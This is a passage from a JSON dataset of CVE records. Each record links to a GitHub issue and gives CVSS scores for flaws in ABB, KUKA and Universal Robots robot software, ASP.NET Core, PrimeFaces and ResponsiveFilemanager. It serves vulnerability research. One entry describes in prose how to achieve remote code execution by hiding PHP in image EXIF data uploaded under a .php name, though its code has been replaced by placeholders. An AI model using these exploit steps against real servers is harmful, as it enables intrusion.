  45951. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45952. "severity": "CRITICAL",
  45953. "baseScore": 9.8,
  45954. "impactScore": 5.9,
  45955. "exploitabilityScore": 3.9
  45956. },
  45957. {
  45958. "CVE_ID": "CVE-2020-10288",
  45959. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3327",
  45960. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3327",
  45961. "Repo_new": "aliasrobotics/rvd",
  45962. "Issue_Created_At": "2020-07-15T22:03:16Z",
  45963. "description": "No authentication required for accessing ABB IRC5 FTP server. yaml id NUMBERTAG title: No authentication required for accessing ABB IRC5 FTP server type: vulnerability description: IRC5 exposes an ftp server (port NUMBERTAG Upon attempting to gain access you are challenged with a request for username and password; however, you can input whatever you like. As long as the field isn't empty it will be accepted. cwe: CVETAG cve: CVETAG keywords: IRC5, FTP, Authentication system: IRB NUMBERTAG IRC5, Robotware NUMBERTAG APITAG vendor: ABB severity: rvss score NUMBERTAG rvss vector: PATHTAG severity description: Critical cvss score NUMBERTAG cvss vector: PATHTAG links: CVETAG flaw: phase: testing specificity: general issue architectural location: Platform code application: FTP server subsystem: APITAG package: N/A languages: None date detected NUMBERTAG detected by: Alfonso Glera, Victor Mayoral Vilches APITAG Robotics) detected by method: testing dynamic, Nmap. date reported NUMBERTAG reported by: Victor Mayoral Vilches reported by relationship: security researcher issue: null reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction image: Not disclosed exploitation: description: Not disclosed exploitation image: Not disclosed exploitation vector: Not disclosed exploitation recipe: '' mitigation: description: Not disclosed pull request: Not disclosed date mitigation: null",
  45964. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45965. "severity": "CRITICAL",
  45966. "baseScore": 9.8,
  45967. "impactScore": 5.9,
  45968. "exploitabilityScore": 3.9
  45969. },
  45970. {
  45971. "CVE_ID": "CVE-2020-10290",
  45972. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/1495",
  45973. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/1495",
  45974. "Repo_new": "aliasrobotics/rvd",
  45975. "Issue_Created_At": "2020-04-03T15:49:12Z",
  45976. "description": "Universal Robots APITAG execute with unbounded privileges. ERRORTAG",
  45977. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45978. "severity": "MEDIUM",
  45979. "baseScore": 6.8,
  45980. "impactScore": 5.9,
  45981. "exploitabilityScore": 0.9
  45982. },
  45983. {
  45984. "CVE_ID": "CVE-2020-10291",
  45985. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3336",
  45986. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3336",
  45987. "Repo_new": "aliasrobotics/rvd",
  45988. "Issue_Created_At": "2020-11-06T09:25:26Z",
  45989. "description": "System information disclosure without authentication on KUKA simulators. ERRORTAG",
  45990. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  45991. "severity": "HIGH",
  45992. "baseScore": 7.5,
  45993. "impactScore": 3.6,
  45994. "exploitabilityScore": 3.9
  45995. },
  45996. {
  45997. "CVE_ID": "CVE-2020-1045",
  45998. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/165",
  45999. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/165",
  46000. "Repo_new": "dotnet/announcements",
  46001. "Issue_Created_At": "2020-09-08T17:44:01Z",
  46002. "description": "Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability. Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names. The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded. The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names. Discussion Discussion for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  46003. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46004. "severity": "HIGH",
  46005. "baseScore": 7.5,
  46006. "impactScore": 3.6,
  46007. "exploitabilityScore": 3.9
  46008. },
  46009. {
  46010. "CVE_ID": "CVE-2020-1045",
  46011. "Issue_Url_old": "https://github.com/dotnet/aspnetcore/issues/25701",
  46012. "Issue_Url_new": "https://github.com/dotnet/aspnetcore/issues/25701",
  46013. "Repo_new": "dotnet/aspnetcore",
  46014. "Issue_Created_At": "2020-09-08T18:12:34Z",
  46015. "description": "Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability. Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names. The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded. The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names. Announcement Announcement for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  46016. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46017. "severity": "HIGH",
  46018. "baseScore": 7.5,
  46019. "impactScore": 3.6,
  46020. "exploitabilityScore": 3.9
  46021. },
  46022. {
  46023. "CVE_ID": "CVE-2020-1045",
  46024. "Issue_Url_old": "https://github.com/github/advisory-database/issues/302",
  46025. "Issue_Url_new": "https://github.com/github/advisory-database/issues/302",
  46026. "Repo_new": "github/advisory-database",
  46027. "Issue_Created_At": "2022-05-19T19:16:56Z",
  46028. "description": ".NET / ASP .NET CVEs package vulnerabilities backfill. Hi team! We would like to backfill to the DB APITAG package vulnerabilities for NUMBERTAG The list of vulnerabilities below are for .NET and ASP.NET Microsoft packages. Those already have CVEs and the impacted packages were specified in announcements published with each CVE in the .NET / ASP.NET Announcement repositories ( URLTAG , URLTAG Please let me know if additional details are needed. //cc MENTIONTAG , MENTIONTAG MENTIONTAG CVE | Title | Announcement date | CVE URL | Announcement URL | Impacted software | Vulnerable package id | Vulnerable version range | Fixed in version | | | | | | | | CVETAG | Open Redirect can cause Elevation Of Privilege | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG APITAG NUMBERTAG CVETAG | Open Redirect can cause Elevation Of Privilege | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can 
enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | 
PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | 
PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | 
.NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Tampering Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Information Disclosure Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Information Disclosure Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Information Disclosure Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG | ? | ? 
CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Domain Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Domain Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Domain Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | 
.NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Elevation Of Privilege Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Elevation Of Privilege Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service 
Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | .NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG",
  46029. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46030. "severity": "HIGH",
  46031. "baseScore": 7.5,
  46032. "impactScore": 3.6,
  46033. "exploitabilityScore": 3.9
  46034. },
  46035. {
  46036. "CVE_ID": "CVE-2020-10544",
  46037. "Issue_Url_old": "https://github.com/primefaces/primefaces/issues/5642",
  46038. "Issue_Url_new": "https://github.com/primefaces/primefaces/issues/5642",
  46039. "Repo_new": "primefaces/primefaces",
  46040. "Issue_Created_At": "2020-03-04T12:09:20Z",
  46041. "description": "tooltip: XSS in target title NUMBERTAG Environment APITAG version NUMBERTAG Does it work on the newest released APITAG version? No Does it work on the newest sources in APITAG No Affected browsers: all NUMBERTAG Expected behavior Proper escaping of title referenced by p:tooltip for NUMBERTAG Actual behavior Target title not escaped in FILETAG if APITAG is set in FILETAG NUMBERTAG Steps to reproduce NUMBERTAG Sample XHTML APITAG APITAG NUMBERTAG Sample bean NUMBERTAG Solution This error was fixed for the APITAG function in FILETAG with NUMBERTAG Same solution should be applied to Function APITAG The line APITAG = APITAG === undefined) ? true : APITAG must be added at top of APITAG",
  46042. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46043. "severity": "MEDIUM",
  46044. "baseScore": 6.1,
  46045. "impactScore": 2.7,
  46046. "exploitabilityScore": 2.8
  46047. },
  46048. {
  46049. "CVE_ID": "CVE-2020-10567",
  46050. "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/600",
  46051. "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/600",
  46052. "Repo_new": "trippo/responsivefilemanager",
  46053. "Issue_Created_At": "2020-03-13T20:06:55Z",
  46054. "description": "remote code execution vulnerability FILETAG in save_img action because of no validation on extension name.. after taking another look at your application i noticed in the FILETAG file in the \"save_img\" action that the \"name\" parameter doesn't validate the extension of the file. this makes it possible to upload php files to the server even when this normaly should not be allowed. there was a miner validation to check if the data from the \"url\" parameter started with \"data:image/jpeg;base NUMBERTAG and that the base NUMBERTAG encoded image is a valid image. a simple work arround to bypass this check is to upload a valid jpeg image, but that inside of exif data a php tag is send. this makes it possible to send php code and that the extension becomes php what let to remote code execution. As poc i will send a normal image where the base NUMBERTAG encoded image contains APITAG as php code. here is a simple javascript POC that will send a POST request to the page \" URLTAG \" where the \"path\" parameters is empty, the url contains my image with phpinfo in the exif data and the name is set to FILETAG . you will need to change the ip and port to your webserver and this code has to be runned on the filemanagers FILETAG page, because the session is validated and by running the code from the dialog page than the session is set and you won't get error's. if you run this command from the browsers console in the dialog page than a new file would be created in the /source/ folder called FILETAG . ( UPLOAD_DIR ) than just go to \" FILETAG \" and you will see the APITAG code executed. ERRORTAG here a copy of the burp request: CODETAG and here a copy of the image urldecoded: ERRORTAG A CVE has been requested and a potential fast patch is to dissable save_img in the config file.",
  46055. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46056. "severity": "CRITICAL",
  46057. "baseScore": 9.8,
  46058. "impactScore": 5.9,
  46059. "exploitabilityScore": 3.9
  46060. },
  46061. {
  46062. "CVE_ID": "CVE-2020-10591",
  46063. "Issue_Url_old": "https://github.com/walmartlabs/concord/issues/22",
  46064. "Issue_Url_new": "https://github.com/walmartlabs/concord/issues/22",
  46065. "Repo_new": "walmartlabs/concord",
  46066. "Issue_Created_At": "2020-03-11T16:35:13Z",
